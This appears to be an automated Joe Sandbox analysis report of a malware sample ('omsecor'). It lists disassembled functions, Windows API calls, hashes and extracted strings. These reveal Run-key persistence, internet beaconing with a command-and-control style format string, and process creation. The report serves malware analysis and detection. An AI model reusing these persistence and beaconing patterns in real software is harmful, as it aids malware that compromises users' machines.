                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$PointerRead$CloseCreateHandleHeapWrite$AllocProcessSize
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1458499590-0
                                                                                                                                                                                                  • Opcode ID: 93e258daf756a991a400698467a0f3e6930ee28086f0462060147eb388563e29
                                                                                                                                                                                                  • Instruction ID: 7ae3b020874f099f6a4231377d147a855b3f50186be4225f3fece46b7b724b47
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 93e258daf756a991a400698467a0f3e6930ee28086f0462060147eb388563e29
                                                                                                                                                                                                  • Instruction Fuzzy Hash: F0416A71901028BADB209BA2DD48EEFBF7DEF45390F104476F619F21A0D7709A10DB64

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • InternetOpenUrlW.WININET(?,hOA,?,00000000,04400000,00000000), ref: 00409CCB
                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00002001,?,?,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF4
                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409CF7
                                                                                                                                                                                                  • InternetReadFile.WININET(?,?,00001000,?), ref: 00409D6E
                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000002,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D80
                                                                                                                                                                                                  • HeapAlloc.KERNEL32(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409D83
                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE3
                                                                                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,?,00406FE2,?,?,?,?,?,?,00000000,00000000), ref: 00409DE6
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Heap$Process$AllocInternet$FileFreeOpenRead
                                                                                                                                                                                                  • String ID: hOA
                                                                                                                                                                                                  • API String ID: 1355009786-3485425990
                                                                                                                                                                                                  • Opcode ID: 786a5954c9ab5f0fe889d4d88a95b872a4b6a838963cd3095893ed4ca2eaaa4a
                                                                                                                                                                                                  • Instruction ID: 638041e7f74e2b46c75c1535d5ef76f15aa532bf5b3977fbb34850ab96fc5943
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 786a5954c9ab5f0fe889d4d88a95b872a4b6a838963cd3095893ed4ca2eaaa4a
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1B418B71900209FFEB119F65C844BAA7BA9FF44355F14847AF819E6292E778CE80CF54

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CountTick
                                                                                                                                                                                                  • String ID: .html$0$8@$From: $Page generated at: $Via: $^key=$^nocrypt$hOA
                                                                                                                                                                                                  • API String ID: 536389180-1762329985
                                                                                                                                                                                                  • Opcode ID: 114e4e40ed3da380897df1d948c25e04c4e8011c16955a8b70e5daac7b5a3a86
                                                                                                                                                                                                  • Instruction ID: 73e0daeea7a9f5f4b783dd0519eebdf5205f1bdf48cad4214514e0173d2ce6b9
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 114e4e40ed3da380897df1d948c25e04c4e8011c16955a8b70e5daac7b5a3a86
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 27416131A0161997CB25EBA2DC51BDE7369FF44308F0044BFB909B71C1EA78AE948F59

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 169 40a786-40a79a 170 40a7b3-40a7ea call 405511 call 4056f9 call 405529 169->170 171 40a79c 169->171 182 40a7f8-40a7fb call 4056f9 170->182 183 40a7ec-40a7f6 170->183 172 40a7a9 call 406d14 171->172 177 40a7ae-40a7b1 172->177 177->170 179 40a79e-40a7a3 Sleep 177->179 179->172 184 40a800-40a815 call 405529 182->184 183->184 188 40a823-40a826 call 4056f9 184->188 189 40a817-40a821 184->189 190 40a82b-40a846 call 405529 call 406cb5 188->190 189->190 196 40a854 call 4056f9 190->196 197 40a848-40a852 190->197 198 40a859-40a87e call 405529 call 4078cb call 40a718 196->198 197->198 206 40a880-40a892 call 40a744 198->206 209 40a894-40a899 Sleep 206->209 210 40a89f-40a8c5 call 406e69 206->210 209->210 213 40a8d2-40a8d5 210->213 214 40a8c7-40a8cc Sleep 210->214 215 40a8d7-40a8da 213->215 216 40a8dc-40a8df 213->216 214->213 215->216 217 40a8e1-40a8f8 GetProcessHeap HeapFree 215->217 216->206 216->217
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • Sleep.KERNEL32(00002710,00000000,00000000,00000000), ref: 0040A7A3
                                                                                                                                                                                                  • Sleep.KERNEL32(0000EA60,?,00000000,00000000,00000000), ref: 0040A899
                                                                                                                                                                                                  • Sleep.KERNEL32(00002710,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8CC
                                                                                                                                                                                                  • GetProcessHeap.KERNEL32(00000000,?,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8E5
                                                                                                                                                                                                  • HeapFree.KERNEL32(00000000,?,?,?,?,?,00000000,00000000,00000000), ref: 0040A8EC
                                                                                                                                                                                                    • Part of subcall function 00406D14: InternetAttemptConnect.WININET(00000000), ref: 00406D18
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Sleep$Heap$AttemptConnectFreeInternetProcess
                                                                                                                                                                                                  • String ID: 0$confirm^rev=%s^code=%s^param=%s^os=%s
                                                                                                                                                                                                  • API String ID: 3100629401-2436734164
                                                                                                                                                                                                  • Opcode ID: c622fb37aa2467ece8f64e14a3bc52ff303aefc1e596290383a82c184368ac36
                                                                                                                                                                                                  • Instruction ID: 7defdabbc875a2827947a9af70fbac2689cb4d570e6f2fffa55db425585f7fd8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: c622fb37aa2467ece8f64e14a3bc52ff303aefc1e596290383a82c184368ac36
                                                                                                                                                                                                  • Instruction Fuzzy Hash: C0418372D00618AACB11EBE1DC859DF73BCEF44304F10847BF505B6181EA789A558F9E

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 218 40782a-40786f GetModuleFileNameW CreateFileW 219 407871-407886 GetFileTime CloseHandle 218->219 220 407888-40788e GetTickCount 218->220 221 4078b0-4078ca call 4057b5 219->221 222 407893-40789d call 40584d 220->222 227 4078a6-4078ae 222->227 228 40789f-4078a5 222->228 227->221 227->222 228->227
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400,00000000,UniqueNum), ref: 0040784D
                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,80000000,00000003,00000000,00000003,00000000,00000000), ref: 00407864
                                                                                                                                                                                                  • GetFileTime.KERNEL32(00000000,?,00000000,00000000), ref: 00407879
                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 00407880
                                                                                                                                                                                                  • GetTickCount.KERNEL32 ref: 00407888
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$CloseCountCreateHandleModuleNameTickTime
                                                                                                                                                                                                  • String ID: UniqueNum
                                                                                                                                                                                                  • API String ID: 1853814767-3816303966
                                                                                                                                                                                                  • Opcode ID: ad12cffd4843a03ac357a7cbd35bb16f9c39c4118ba2163eb990dc6e8f3d9bd4
                                                                                                                                                                                                  • Instruction ID: 2f8cc66c71eb5b32faf52737d8a911681d4da4e376004c23895cdbe2f04b10ac
                                                                                                                                                                                                  • Opcode Fuzzy Hash: ad12cffd4843a03ac357a7cbd35bb16f9c39c4118ba2163eb990dc6e8f3d9bd4
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AE110633419220ABD210AB65EC4CA9B7FACEF45760F004A3AF964E21D0D6349211C7AB

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 229 407e2b-407e3b 230 407e3d-407e3f call 407cd7 229->230 231 407e4e-407e7c SetFilePointer ReadFile 229->231 236 407e44-407e4c 230->236 233 407eba 231->233 234 407e7e-407e82 231->234 235 407ebc-407ebe 233->235 234->233 237 407e84 234->237 236->231 236->233 238 407e86-407e8f 237->238 238->238 239 407e91-407ea7 call 405493 238->239 239->233 242 407ea9-407eb8 call 405511 239->242 242->235
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • SetFilePointer.KERNEL32(00000000,00000000,00000000,UniqueNum), ref: 00407E5C
                                                                                                                                                                                                  • ReadFile.KERNEL32(?,00000064,00000001,00000000), ref: 00407E74
                                                                                                                                                                                                    • Part of subcall function 00407CD7: GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                                                                                                                                                                                                    • Part of subcall function 00407CD7: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$CreateModuleNamePointerRead
                                                                                                                                                                                                  • String ID: UniqueNum$d$hOAd$x
                                                                                                                                                                                                  • API String ID: 1528952607-1018652783
                                                                                                                                                                                                  • Opcode ID: 015ecc0cc43ae81723c1e035d0cdbf130f909c8143b489dc0bfa89a80df37f55
                                                                                                                                                                                                  • Instruction ID: 0df55d11f519ebf6f0451cc58b4543fb7278309a9039aac926228ebb90f40a66
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 015ecc0cc43ae81723c1e035d0cdbf130f909c8143b489dc0bfa89a80df37f55
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5311A531D09308AADF109B61DD05BDB3B6AAB00324F218676E612F61E0E7749D44CBAE

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 245 40ac20-40ac48 RegOpenKeyExW 246 40ac60-40ac76 RegOpenKeyExW 245->246 247 40ac4a-40ac55 call 4069c0 245->247 249 40ac78-40ac7a 246->249 250 40ac7c-40ac87 call 4069c0 246->250 251 40ac5a-40ac5e 247->251 252 40ac8e-40ac92 249->252 254 40ac8c-40ac8d 250->254 251->246 251->252 254->252
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RegOpenKeyExW.KERNEL32(80000001,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,74DF0900,00000400,00000000, /nomove,?,0040AB30,?,?,0040B3E5), ref: 0040AC44
                                                                                                                                                                                                  • RegOpenKeyExW.KERNEL32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run,00000000,00000001,00000000,?,0040AB30,?,?,0040B3E5), ref: 0040AC72
                                                                                                                                                                                                    • Part of subcall function 004069C0: RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,75A8E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                                                                                                                                                                                                    • Part of subcall function 004069C0: RegCloseKey.KERNEL32(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: Open$CloseQueryValue
                                                                                                                                                                                                  • String ID: /nomove$IueiOod$SOFTWARE\Microsoft\Windows\CurrentVersion\Run
                                                                                                                                                                                                  • API String ID: 3546245721-4228964922
                                                                                                                                                                                                  • Opcode ID: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
                                                                                                                                                                                                  • Instruction ID: 3bac8edf5f415b784fe4546894dc74dc09b9405a13c640cee1cd261e7a9a2bb6
                                                                                                                                                                                                  • Opcode Fuzzy Hash: e183a9483fa9f7ba9bb43204af9f8e84b77f88267b9ccf7be8296576afd26502
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 5F01867265430EFEFF1096919D42F9A736CDB40768F210036FA00B60D1D6B6AE155779

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetCommandLineW.KERNEL32(?,0040B3E5), ref: 0040AB0A
                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000820,00000400,?,0040B3E5), ref: 0040AB44
                                                                                                                                                                                                  • CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB57
                                                                                                                                                                                                  • CharLowerW.USER32(?,?,0040B3E5), ref: 0040AB60
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CharLower$CommandFileLineModuleName
                                                                                                                                                                                                  • String ID: /nomove
                                                                                                                                                                                                  • API String ID: 1338073227-1111986840
                                                                                                                                                                                                  • Opcode ID: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
                                                                                                                                                                                                  • Instruction ID: b8029fc6669f79c45f6caaa8ce38406425976cf3cabd4088da44db58d281c6d8
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 00c7a09b5e38cd9dc17e43fc8aab8f350de87f2bf6048177a511846302a86bad
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 7CF01D7290022956DB10A7B19C05BDB72ACFF40309F0445B6AA05F2180ED78EA548F95

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 268 407cd7-407cfe call 40d5b0 GetModuleFileNameW 271 407d00-407d0b call 406cf9 268->271 272 407d0d-407d15 GetCurrentDirectoryW 268->272 273 407d1b-407d31 call 4054ed 271->273 272->273 278 407d33-407d35 273->278 279 407d36-407d60 CreateFileW 273->279 278->279
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00001000,00000000,00000000,?,00407E44,00000001,UniqueNum), ref: 00407CF6
                                                                                                                                                                                                  • GetCurrentDirectoryW.KERNEL32(00001000,?,?,00407E44,00000001,UniqueNum), ref: 00407D15
                                                                                                                                                                                                  • CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000004,00000002,00000000,?,00407E44,00000001,UniqueNum), ref: 00407D48
                                                                                                                                                                                                  Strings
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$CreateCurrentDirectoryModuleName
                                                                                                                                                                                                  • String ID: \merocz.xc6
                                                                                                                                                                                                  • API String ID: 3818821825-505599559
                                                                                                                                                                                                  • Opcode ID: 2f84b54d5be0d3dae659ee3f303fbd3ad06020502789306fc31ef9c8cba0b7e5
                                                                                                                                                                                                  • Instruction ID: bb9f2ddab4bab237696810683399403c99d26191ea9c434de7a02090ea9b9a12
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 2f84b54d5be0d3dae659ee3f303fbd3ad06020502789306fc31ef9c8cba0b7e5
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DA01A231904224ABE7309B569C49FEB77ADEF85710F00447FB505F20D1D6749A80CAAA

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 280 407727-407751 call 40d5b0 GetModuleFileNameW 283 407753-40776b call 4075d4 280->283 284 40776d-40776e 280->284 289 4077e1-4077ea 283->289 286 407774-4077a0 ExpandEnvironmentStringsW call 4075d4 284->286 291 4077a2-4077a5 286->291 292 4077eb-4077ee 286->292 294 4077b7-4077ba 291->294 295 4077a7-4077b5 GetLastError 291->295 293 4077e0 292->293 293->289 297 4077d2-4077dc 294->297 298 4077bc-4077c8 GetLastError 294->298 296 4077ca call 40a786 295->296 301 4077cf 296->301 297->286 299 4077de 297->299 298->296 299->293 301->297
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • GetModuleFileNameW.KERNEL32(00000000,?,00000400,74DF0900,00000400,00000000,0040B4B3,00000000), ref: 00407744
                                                                                                                                                                                                  • ExpandEnvironmentStringsW.KERNEL32(?,00000400), ref: 00407784
                                                                                                                                                                                                  • GetLastError.KERNEL32(00000004), ref: 004077A9
                                                                                                                                                                                                    • Part of subcall function 004075D4: CreateFileW.KERNEL32(?,80000000,00000001,00000000,00000003,00000080,00000000,00000000,00000000,00000400), ref: 004075FC
                                                                                                                                                                                                    • Part of subcall function 004075D4: CreateFileW.KERNEL32(?,C0000000,00000000,00000000,00000002,00000080,00000000), ref: 00407618
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: File$Create$EnvironmentErrorExpandLastModuleNameStrings
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1536607067-0
                                                                                                                                                                                                  • Opcode ID: 89cd35a4e2c2c3bd6fcfd873d8aca65b8c9597df86e0d91d22dc3db87ccf143e
                                                                                                                                                                                                  • Instruction ID: de8f4f1c442ba604be96c6aabbb627c7d922d162aa2fadd5385f895ae0141ebd
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 89cd35a4e2c2c3bd6fcfd873d8aca65b8c9597df86e0d91d22dc3db87ccf143e
                                                                                                                                                                                                  • Instruction Fuzzy Hash: AD11E972908249AED720D7A19C81FEB739CFB44354F10483BFB95E30D0E678B945866B

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 302 4077f0-407829 call 40d530 CreateProcessW
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • _memset.LIBCMT ref: 00407800
                                                                                                                                                                                                  • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,?,?,?,?,00000400), ref: 0040781B
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CreateProcess_memset
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 1177741608-0
                                                                                                                                                                                                  • Opcode ID: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
                                                                                                                                                                                                  • Instruction ID: 3694313203bda926a09df6f19e1a61ce713b6a49f930e6e3ed03be73a1123fdc
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0cd9a43e4f1b4c0064b4bee2692f9063eedacf03e95d61430481666f95000588
                                                                                                                                                                                                  • Instruction Fuzzy Hash: 1DE048B294113876DB20A6E69C0DDDF7F6CDF06694F000121BA0EE50C4E5749608C6F5

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 312 4069c0-4069fc RegQueryValueExW RegCloseKey
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • RegQueryValueExW.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,75A8E9B0,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?), ref: 004069E3
                                                                                                                                                                                                  • RegCloseKey.KERNEL32(00000000,?,?,?,0040AC8C,IueiOod,?,?,0040AB30,?,?,0040B3E5), ref: 004069ED
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                  • API ID: CloseQueryValue
                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                  • API String ID: 3356406503-0
                                                                                                                                                                                                  • Opcode ID: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
                                                                                                                                                                                                  • Instruction ID: 7cb27e63b8b96f7a1a34dd7d249ffcc2d4336ce0f7aa5f451266b78b49120899
                                                                                                                                                                                                  • Opcode Fuzzy Hash: 149707b6f704b0206dcd429f7e61dcdc4ff4cc903c0dfabc6e5b0404234ae6db
                                                                                                                                                                                                  • Instruction Fuzzy Hash: DCE06D7A000208BBEF104F94CD09BD97BB9EB44358F208464BA00A6150D67596149B14

                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                  control_flow_graph 313 406d14-406d20 InternetAttemptConnect 314 406d22-406d25 313->314 315 406d26-406d41 InternetOpenW 313->315
                                                                                                                                                                                                  APIs
                                                                                                                                                                                                  • InternetAttemptConnect.WININET(00000000), ref: 00406D18
                                                                                                                                                                                                  • InternetOpenW.WININET(00000000,00000001,00000000,00000000,00000000), ref: 00406D2C
                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                  • Source File: 00000002.00000002.2260030732.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                  • Associated: 00000002.00000002.2259985197.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260054654.000000000040E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  • Associated: 00000002.00000002.2260070852.0000000000411000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                  • Snapshot File: hcaresult_2_2_400000_omsecor.jbxd
                                                                                                                                                                                                  Similarity
